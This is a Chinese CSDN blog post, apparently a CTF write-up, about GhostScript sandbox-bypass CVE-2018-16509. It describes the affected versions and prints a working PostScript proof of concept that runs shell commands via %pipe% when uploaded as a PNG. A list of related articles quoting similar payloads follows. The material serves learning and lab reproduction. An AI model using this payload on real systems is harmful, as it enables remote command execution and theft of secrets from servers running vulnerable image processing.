Buuctf [GhostScript]CVE-2018-16509

最新推荐文章于 2024-03-03 20:01:47 发布
最新推荐文章于 2024-03-03 20:01:47 发布
阅读量119 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch258563/article/details/130950516
版权
文章揭示了一个影响GhostScript9.24之前的版本的安全漏洞,该漏洞可以通过上传特制的PNG文件触发,导致代码执行。依赖GhostScript的库,如ImageMagick和PythonPIL,可能受到此漏洞的影响。攻击者可以利用这个漏洞来读取系统环境变量并获取敏感信息。
摘要由CSDN通过智能技术生成

漏洞描述

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

漏洞影响

Ghostscript 9.24之前版本

漏洞复现

 直接上传一个png打poc

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

打印环境变量,获得flag

 

 

土豆儿258563
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509
qq_51577576的博客
12-07 732
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509 CVE-2018-16509是由于GhostScript在处理/invalidaccess异常时,程序没有正确的检测restoration of privilege(权限恢复),导致攻击者可通过提交特制的PostScript利用该漏洞执行代码。
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475
qq_51577576的博客
12-17 712
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475 CVE-2018-19475是CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509
JiangBuLiu的博客
07-08 2030
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/ 漏洞原理 GhostScript 被许多图片处理库所使用,如 ImageMagick、Pyt...
GhostScript 沙箱绕过(命令执行)CVE-2018-16509/6116/19475/ 漏洞
weixin_51387754的博客
11-24 1031
标题 browse——ghost.png 提交 submit Query
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509
EC_Carrot的博客
06-06 216
漏洞背景 2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 影响范围 Artifex Ghostscript 9.24之前版本 漏洞复现 先下载Poc图片,源码: %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stoppe
buuctf [GhostScript]CVE-2018-16509
qq_1873822的博客
03-31 594
漏洞描述 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 https://blog.csdn.net/JiangBuLiu/article/details/95061202 漏洞影响 Ghostscript 9.24之前版本 漏洞复现 直接上传一个png打poc %!PS userdict /setpagedevice undef save legal {
[春秋云镜]CVE-2018-16509
niubi707的博客
12-02 5325
春秋云镜CVE-2018-16509GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 Python 中处理图片的模块 PIL(Pillow),因为其内部调用了 GhostScript 而受到 CVE-2018-16509的影响
Gitlab 任意文件读取漏洞(CVE-2016-9086)和漏洞(CVE-2018-19475)
m0_53603468的博客
12-25 798
文章目录一、概述**任意文件读取漏洞**二、漏洞复现 一、概述 Gitlab 任意文件读取漏洞(CVE-2016-9086) 影响版本Gitlab版本:8.13.1之前 GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 GitLab由乌克兰程序员DmitriyZaporozhets和ValerySizov开发,它使用Ruby语言写成。后来,一些部分用Go语言重写。截止
vulhub中ghostscriptcve-2018-16509漏洞复现记录
xeeyuuuu的博客
04-08 580
该漏洞在kali环境中复现,首先进入CVE-2018-16509目录,开启docker-compose环境 开启漏洞环境命令: ​ docker-compose build ​ docker-compose up -d 参考:https://blog.csdn.net/qq_41901122/article/details/107978142 访问该地址,可以看到有文件上传的途径 端口8080 poc:poc.png poc地址:https://github.com/vulhub/vulhub/blob
GhostScript沙箱绕过(命令执行漏洞)CVE-2018-16509
她叫常玉莹
07-27 1022
2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 访问http://192.168.0.104:8080上传poc.png 执行id > /tmp/succ
【漏洞靶场】--GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509
hello word的博客
01-06 2225
环境 exp 把如下代码保存为一个png文件。 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops 上传,执行l
复现vulhub中ghostscriptCVE-2018-16509漏洞
最新发布
YX_zjp的博客
03-03 369
使用腾讯云轻量服务器安装vulhub。系统:ubuntu20.04。可以看到相关端口是8080。done表示环境已开启。
GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-16509 漏洞复现
ADummy的博客
02-24 332
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509) by ADummy 0x00利用路线 ​ 构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 ​ 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞: http://seclists.org/oss-sec/2018/q3/142 https://b
GhostScript 沙箱绕过命令执行漏洞
m0_63241485的博客
08-26 1149
当dorestore退出时,LockFilePermissions的值被设置为falsea = blob;随后使用.setuserparams方法还原LockFilePermissionsa = blob;但是,在restore之后,.setuserparams方法执行之前,可能会抛出StackOverflowError栈溢出错误,不会重置“LockFilePermissions”。从而导致绕过-dSAFER。...
Ghostscript沙箱绕过(CVE-2021-3781)分析
Tencent_SRC的博客
10-29 1442
文|腾讯蓝军 路飞0x00 前言Ghostscript是一款Adobe PostScript语言和PDF的解释器软件,被诸多著名应用(如ImageMagick)所使用。9月5日,海外安全研...
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4972
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
ghostscript-9.02.tar.gz
05-15
ghostscript-9.02.tar.gz 是一个开源的软件包,该软件提供了一种将 PostScript 和 PDF 文件转换成其他格式(如 JPEG、PNG、TIFF 等)的方法。Ghostscript 能够解析 PostScript 和 PDF 页面描述语言,利用它们生成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值